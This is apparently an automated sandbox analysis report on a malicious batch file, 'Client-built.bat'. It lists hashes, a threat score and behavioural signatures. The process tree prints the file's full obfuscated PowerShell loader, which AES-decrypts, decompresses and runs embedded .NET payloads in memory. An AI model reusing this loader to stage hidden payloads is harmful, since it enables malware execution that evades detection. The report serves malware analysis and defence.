Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
12-05-2024 15:22
Static task
static1
Behavioral task
behavioral1
Sample
Client-built.bat
Resource
win7-20240220-en
windows7-x64
4 signatures
150 seconds
General
-
Target
Client-built.bat
-
Size
1.9MB
-
MD5
ca98faeecf7f69f417e6b8e706986b2e
-
SHA1
2ed0d04b476658f57e50b86dba53cdc0edb379e8
-
SHA256
69d3f18cd40fe951e863d6f7cb34f623ae1f169a030c166efd713630744b14da
-
SHA512
ad3a6e51492f68bf623b08d01d8d9cc9bc58a6496e04c734ddacd2be120987f56ff228bf24f92a67aff408d801a670cfbb83564907219523776b7a8263b41d64
-
SSDEEP
24576:DqPPl9YNqSrDNfqgg4edWKa1tpD0jH3F8DbFkBNKUXuiFgZULkB4VmVc0i6MwGxb:W1cqzx/WOrBSkQJ8b
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2836 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 2732 wrote to memory of 2828 2732 cmd.exe cmd.exe PID 2732 wrote to memory of 2828 2732 cmd.exe cmd.exe PID 2732 wrote to memory of 2828 2732 cmd.exe cmd.exe PID 2732 wrote to memory of 2836 2732 cmd.exe powershell.exe PID 2732 wrote to memory of 2836 2732 cmd.exe powershell.exe PID 2732 wrote to memory of 2836 2732 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LfcFzG8RsgFQuzCbge5AZWKnjDyvcb7J2DMyfnjW+WE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t0LkWuaxKmd71m5FdnY80w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vGXxC=New-Object System.IO.MemoryStream(,$param_var); $MJyez=New-Object System.IO.MemoryStream; $GEiaV=New-Object System.IO.Compression.GZipStream($vGXxC, [IO.Compression.CompressionMode]::Decompress); $GEiaV.CopyTo($MJyez); $GEiaV.Dispose(); $vGXxC.Dispose(); $MJyez.Dispose(); $MJyez.ToArray();}function execute_function($param_var,$param2_var){ $wRrOX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JYzvg=$wRrOX.EntryPoint; $JYzvg.Invoke($null, $param2_var);}$BMtWH = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$host.UI.RawUI.WindowTitle = $BMtWH;$VjJUr=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BMtWH).Split([Environment]::NewLine);foreach ($buUQD in $VjJUr) { if ($buUQD.StartsWith('ZyCIkpbtJnSamEKtqvbb')) { $OKyUT=$buUQD.Substring(20); break; }}$payloads_var=[string[]]$OKyUT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2828
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836